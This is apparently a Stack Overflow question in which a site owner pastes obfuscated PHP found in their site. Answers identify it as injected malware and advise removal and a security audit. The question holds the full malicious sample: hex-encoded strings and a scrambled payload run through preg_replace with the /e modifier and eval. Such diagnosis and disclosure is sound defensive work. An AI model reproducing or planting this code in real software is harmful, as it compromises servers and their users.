# What does this piece of code mean in PHP?

Tags: php, server-side-attacks

Upon updating a PHP website, I came across this piece of code.
It doesn't make any sense.

What could be this??
An attack on website or something???

```
 <?php

if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
 {
 $ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
 if ((!strstr($ua, "\x6d\163\x69\145")) && (!strstr($ua, "\x72\166\x3a\61\x31")) && (!strstr($ua, "\x61\156\x64\162\x6f\151\x64")) && (!strstr($ua, "\x6d\157\x62\151\x6c\145")) && (!strstr($ua, "\x69\160\x68\157\x6e\145")) && (!strstr($ua, "\x69\160\x61\144")) && (!strstr($ua, "\x6f\160\x65\162\x61\40\x6d"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
 } ?><?php
$vwxsajnbcm = 'sfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%y74]273]y76]252]y85]256]y6g]257]y86]267]y7x5c%x78257UFH#%x5c%x78!)%x5c%x7825z>>2*!%x5c256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUf+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;tn+qsvmt+fmhpph#)zbssb!-#}#)fep5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gp25kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y4]275]y7:]268]y7f#<!%<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cj0#!%x5c%x782f!**#sfmcnbs+yfeoSFSFGFS%x5c%x7860QUUI&c_UOFHBuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x787825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%vg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%if((function_exists("%x6f%142%x5f%1!<##!>!2p%x5c%x7825!|!*85c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5x7825rN}#QwTW%x5c%x7825hIr%x%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x7825nfd)##Qtpz)#]341]88M4P8]35c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x78>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%xb%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<*65]y31]55]y85]82]y76]62]y3:]84#-:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctu,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:52976]258]y6g]273]y76]271])-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52273]y76]258]y6g]273]y76]271]y7d]252%x7822:ftmbg39*56A:>:#+I#)q%x5c%x7825:>:r%x5c%x78255%x5c%x785cSFWSFT%x5c%x>%x5c%x782272qj%x5c%x5c%x7825)7gj6<*id%xx5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x7f_*#fubfsdXk5%x5c%x7860<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdx7825iN}#-!tussfw)%x5c%x78h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7826-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#%x5c%x782fq%x5c%x7825>U<#16pjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%xy72]265]y39]274]y85]273]y6gx5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%sfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7875c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x784]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c]248L3P6L1M5]D2P4]D6#<%x5c%x77827K6<%x5c%x787fw6*3qj%x5c%x78257{66~6<&w6<%x5c%x787fw6*CW&)7#)tutjyf%x5c%x7860opjudo7825:-5ppde:4:|:**#ppde#)tutjyf%5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946OSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%%x5c%x782f},;#-#}+;%s)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x6:!}7;!}6;##}C;!>>!}W;utpi}Y;7]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_bz+sfwjidsb%x5c%x7860bj+upco6057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k825=*h%x5c%x7825)m%x5c)))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg(pmpusut)tpqssutRe%x5c%x7825)Rd%x#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x78osvufs}w;*%x5c%x787f!>>%x5c%x75c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x78!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x782x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782]81#%x5c%x782f#7e:5594%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvrf{jt)!gj!<*2bd%x5c%x7825-#1G8X6<#o]o]Y%x5c%x78257;5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x%x5c%x7824<%x5c%x78e%x5c%x7%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323z#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%xy7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7820hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787863%x74%141%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"]fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#8{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3>2b%x5c%x7825!<*qp%x5c%x71*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x76*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78y<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825b825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]567860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x7824-%x5c%x7824-!%utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%25!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgAmqnj!%x5c%x782f!#0#)idubn%x5c%x786x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78{hnpd!opjudovg!|!**#j{hnpd]452]88]5]48]32M3]317]445]212]4tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;5tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5P6]36]73]83]238M7]381]211M5]67%x7825j,,*!|%x5c%x7824-55%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e27rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!ds822!pd%x5c%x7825)!gj}Z;h!o:|:**t%x5c%x7825)m%x5c%x7!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*Xbek!~!<b%x5c%x7825%x5c%x787f!5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x52]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]!%x5c%x7825mm!>!#]y81]%x7825:osvufs:~:<*9-1-r%x5c%x782y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>27!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7O%x5c%x7822#)fepmqyfAW~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tus%x7825):fmji%x5c%x7878:<##:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fu*qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j8Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878825>j%x5c%x7825!<**3-!OVMM*<%x22%51%x29%51%x29%73", NULL); }c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%xx5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfic%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]5!tus%x5c%x7860sfqmbdf)%x5c%x7%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<%x29%57%x65","%x65%166%x61%154%x2T-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x%x5c%x7825)utjm!|!*5!%x5c%x7827j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D68b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x78d>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c24Ypp3)%x5c%x7825cB%x5c%AZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,7u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7825G]y6d]281Ld]245]K2]285]!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%xc%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%xKe]53Ld]53]Kc]55Ld]55#*5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{7*&7-n%x5c%x7825)utjm6<%x5c%x787fwx7825>j%x5c%x7825!*3!%x5c%x7827x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%xy81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j1]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x78y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x782%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x5c%x7825)+opjudovg+)!gj+{e%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f]273]y76]271]y7d]252]7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#bmgoj{h1:|:*mmvo:>:iuhofm%x5c%x%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|:!ftmf!}Z;^nbsbq%x5c%x782q%x5c%x7825}U;y]}R;2]},;osvufs}24)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~8%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%1y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]256<pd%x5c%x7825w6Z6<.3%&;ftmbg}%x5c%x787f;!%x5c%x7860ufldpt}X;%x5c%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd7]278]225]241]334]368]322]3]364]6]283]427]36]373x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj5-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x78&w6<%x5c%x787fw6*CW&)7gj6<.[A%x827&6<*rfs%x5c%x78257-K)fujs%x5c%x7872-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>25c*W%x5c%x7825eN+#Qi%x5c%x75c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**5)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]2%x5c%x7827doj%x5c%x78256<%x45]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*W~%x5c%x7824<!%x5c%x7825o:!>D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D21%76%x21%50%x5c%x7825$n){return chr(ord($nc%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg/(.*)/epreg_replacewehsderyhp';
$ocskvyfdqx = explode(chr((235 - 191)) , '818,35,4175,64,3243,58,10019,21,1481,56,7033,33,9024,59,5326,57,1686,59,9997,22,6700,49,9235,48,957,43,2373,61,9124,24,3546,52,6656,44,4065,66,7902,34,4455,34,3502,44,7578,38,9473,37,3774,22,4735,58,84,22,5432,56,3405,49,6749,60,2571,34,1646,20,9331,57,3678,68,3923,58,7256,68,6588,68,530,48,1084,48,1745,24,2605,28,4959,49,9839,27,9193,42,8579,38,1666,20,5865,57,128,44,2749,63,6984,49,9442,31,7851,51,2900,29,5164,55,9168,25,2180,68,230,39,5601,37,9148,20,3375,30,5550,26,2057,49,9739,38,9580,67,7936,31,6407,67,3598,58,9388,54,6122,48,6528,21,7155,52,7124,31,7642,45,9510,70,8087,65,5107,26,2633,24,780,38,8351,44,300,44,3746,28,6170,21,4386,25,4548,64,8617,42,2472,70,6944,40,4025,40,8971,53,853,23,4297,38,578,30,3156,28,269,31,5008,34,4131,44,3301,32,2689,60,1270,42,3112,44,608,29,3874,49,5703,29,425,52,1170,68,6317,48,3184,37,8812,25,1623,23,8680,60,2812,20,6809,64,7427,68,1572,21,6256,61,8740,31,2657,32,8524,55,8495,29,6083,39,1132,38,4664,47,5638,65,7519,59,2029,28,1359,45,2991,52,637,40,4335,51,8837,31,8771,41,3454,48,5042,65,4793,69,5922,55,2106,27,8659,21,6031,52,8206,63,9083,41,42,42,404,21,2133,47,5999,32,9777,62,2929,62,1593,30,5576,25,3221,22,6227,29,1846,69,4612,52,5796,69,9923,27,6365,42,5977,22,1537,35,8305,46,4711,24,724,56,1312,47,2832,68,1029,55,6915,29,677,47,477,53,5303,23,8449,46,8395,54,5488,62,4239,58,8929,42,6873,42,8152,54,7495,24,1820,26,9711,28,876,53,2314,59,6474,54,6191,36,2248,66,929,28,7207,49,1915,70,5219,54,4862,47,1404,54,5383,49,3656,22,1985,44,7324,34,4909,50,9950,47,2434,38,2542,29,7616,26,7828,23,1769,51,4489,59,7066,58,1000,29,9283,48,5273,30,5133,31,9866,57,0,42,7967,50,3796,51,5732,64,9647,64,4411,44,7752,37,8269,36,7789,39,7687,65,10040,66,106,22,3043,69,3847,27,7358,69,8868,61,3333,42,344,60,1458,23,3981,44,172,58,8017,70,1238,32,6549,39');
$niqesrdxdn = substr($vwxsajnbcm, (32536 - 22430) , (34 - 27));

if (!function_exists('zzrfhvkcwo'))
 {
 function zzrfhvkcwo($znzwjxpcyc, $lfafkymhqq)
  {
  $xnhcrqpkcp = NULL;
  for ($gznncvjdur = 0; $gznncvjdur < (sizeof($znzwjxpcyc) / 2); $gznncvjdur++)
   {
   $xnhcrqpkcp.= substr($lfafkymhqq, $znzwjxpcyc[($gznncvjdur * 2) ], $znzwjxpcyc[($gznncvjdur * 2) + 1]);
   }

  return $xnhcrqpkcp;
  };
 }

$zwqshkkfti = "\x20\57\x2a\40\x6b\170\x70\153\x66\170\x64\171\x64\142\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x32\55\x31\64\x35\51\x29\54\x20\143\x68\162\x28\50\x34\65\x30\55\x33\65\x38\51\x29\54\x20\172\x7a\162\x66\150\x76\153\x63\167\x6f\50\x24\157\x63\163\x6b\166\x79\146\x64\161\x78\54\x24\166\x77\170\x73\141\x6a\156\x62\143\x6d\51\x29\51\x3b\40\x2f\52\x20\144\x76\155\x63\147\x72\163\x76\153\x68\40\x2a\57\x20";
$fqlqhefvbx = substr($vwxsajnbcm, (52826 - 42713) , (57 - 45));
$fqlqhefvbx($niqesrdxdn, $zwqshkkfti, NULL);
$fqlqhefvbx = $zwqshkkfti;
$fqlqhefvbx = (686 - 565);
$vwxsajnbcm = $fqlqhefvbx - 1; ?>
```

Comment: Just copy-paste the funny looking strings in JavaScript console.

Comment: Everything looks funky when I look at this. @Salman A

Comment: It seems to me, this is an obfuscated code.

Answer (score 5, accepted):

Yes. It's a hack. The randomly-generated variable names, etc. both obfuscate the content and make it less easy to search for using scanners—the code will do the same thing, but using different variable names, etc., on each site, so you can't just search for specific strings to find it. [Here's another example of what looks like the same hack](http://blog.sucuri.net/2014/10/wordpress-websites-continue-to-get-hacked-via-mailpoet-plugin-vulnerability.html).

You should remove the code, but of course that won't remove whatever vulnerability allowed the hacker to put it there in the first place, so you need to audit the site and fix that, too. That's way beyond the scope of an answer here, and off-topic for Stack Overflow, too. (You may have more luck on http://security.stackexchange.com, but check [their help centre](https://security.stackexchange.com/help) before posting...)

Is this a WordPress website, too? I'd carefully follow all the advice in [FAQ "My Site Was Hacked"](http://codex.wordpress.org/FAQ_My_site_was_hacked).

Comment: Haha just wanted to post the same answer ;)

Comment: Does deleting that piece of code make my website secure from this piece of attack?? Or should I take any other measures? @Matt Gibson

Comment: It's not a Wordpress website. @Matt Gibson

Comment: No, deleting that piece of code does not make your website secure from this kind of attack. The original attack was what inserted this code—it wasn't there before you were hacked. You need to figure out, if you can, what security vulnerability on the site allowed the hacker to inject code onto your server in the first place, otherwise they could just do it again in the same way.

Comment: OK. Thank you Mr. Gibson. @Matt Gibson